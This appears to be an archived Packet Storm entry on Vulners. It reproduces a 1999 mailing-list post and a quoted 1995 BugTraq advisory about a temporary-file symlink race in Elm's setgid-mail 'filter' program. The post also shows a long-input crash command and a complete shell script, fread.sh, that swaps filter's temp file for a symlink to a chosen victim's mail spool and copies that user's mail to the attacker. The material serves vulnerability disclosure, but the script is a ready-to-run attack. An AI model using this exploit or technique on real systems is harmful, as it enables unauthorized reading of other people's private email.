Lucene search
K

elm_filter.txt

🗓️ 19 Sep 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Elm filter program has an exploit allowing unauthorized email access due to improper file handling.

Code
`Subject: elm filter program  
To: [email protected]   
  
  
Mark Ultor wrote:  
  
  
> I've found a bug in filter on Elm 2.4 PL25. filter got SGID on mail group.  
>  
> sowatech:~$ filter -f `perl -e ' print "A" x 5000'`  
> Segmentation fault  
  
  
"filter" is inherently unsafe. A bug has been described in 1995 which  
allows reading email of anybody on the system. The description can be  
found in the BugTraq archives, I believe. I include the full message  
below. While it was written in 1995, it still works with the filter  
version of Elm 2.4ME+ PL35 (25) which is from 1997. (I don't know  
whether there are any more recent elm versions.)  
  
  
--Cornelius.  
  
  
------cut here-------  
  
  
filter (elm package) security hole  
  
  
David J Meltzer ([email protected])  
Tue, 26 Dec 1995 15:07:49 -0500  
  
  
* Messages sorted by: [ date ][ thread ][ subject ][ author ]  
* Previous message: Scott Chasin: "Happy Holidays"  
  
  
The elm filter under linux runs sugrp mail, thus allowing it to freely  
read and write from users mail spools. It is only through the integrity  
of its code that the security of linux's mail system is protected; and in  
this respect it falls short. The failure of the filter program to properly  
handle temporary files allows a user to read or write to any user's mail  
spool, a significant security hole.  
The specific problem that is exploited in this hole is the way filter  
uses a temporary file to store the input to it, and then subsequently send  
it back out according to the filter. Because of the modularity of the  
coding, in the main filter.c, the temporary file is opened, and then written  
to; after which it is closed. The mailmessage function is then called, with  
the purpose of forwarding that mail, written to the temporary file, to  
whatever destination is specified in the filter. At the start of this  
process, the temporary file is opened, and the contents of it are dumped  
to the mail spool of the user the mail is being forwarded to.  
At any point after the file has been initially opened by the main filter  
function, since the user running filter has permissions on that temp file,  
it can be rm'd. The temp file existing can then be replaced with a symbolic  
link to any file that group mail has read permissions on. When it is opened  
in the mailmessage function, the symbolic link is followed and whatever file  
that was pointed to will be read in, and the contents forwarded to the user  
specified in the mail spool.  
  
  
The complete exploits are shown below:  
  
  
Program: filter, an elm utility  
Affected Operating Systems: linux - Slackware 3.0, others with sgid mail filter  
Requirements: account on machine  
Security Compromise: user can read any mail spool readable by grp mail.  
(usually everything, sometimes not root)  
Author: Dave M. ([email protected])  
Synopsis: filter writes out the mail to be forwarded to a  
temporary file, which is then closed and reopened;  
if when the temporary file is reopened it is a  
symlink to a mail spool, filter will proceed  
to forward the contents of that file as if it was  
the original message.  
  
  
------cut here-------  
  
  
#!/bin/sh  
# This shell script exploits a problem with filter(1L)  
# it will follow symbolic links, on a read allowing  
# us to steal a users mail file.  
#  
# Usage: fread.sh victimsusername  
#  
# Contents will be stored in ~/victimsusername.mail  
#  
# Dave M. ([email protected])  
#  
  
  
cp /var/spool/mail/$LOGNAME ~  
cp /dev/null /var/spool/mail/$LOGNAME  
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp  
  
  
cat << _EOF_ >> /tmp/fread-msg.tmp  
From: Dave  
To: $LOGNAME  
Subject: Filter Exploit  
  
  
_EOF_  
  
  
echo sleep 2 > /tmp/fread-sh.tmp  
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp  
chmod +x /tmp/fread-sh.tmp  
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &  
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`  
rm -f /tmp/filter.$FREAD  
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD  
sleep 2  
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp  
/tmp/fread-ftr.tmp /tmp/filter.$FREAD  
FREAD=  
cp /var/spool/mail/$LOGNAME ~/$1.mail  
cp ~/$LOGNAME /var/spool/mail  
more ~/$1.mail  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation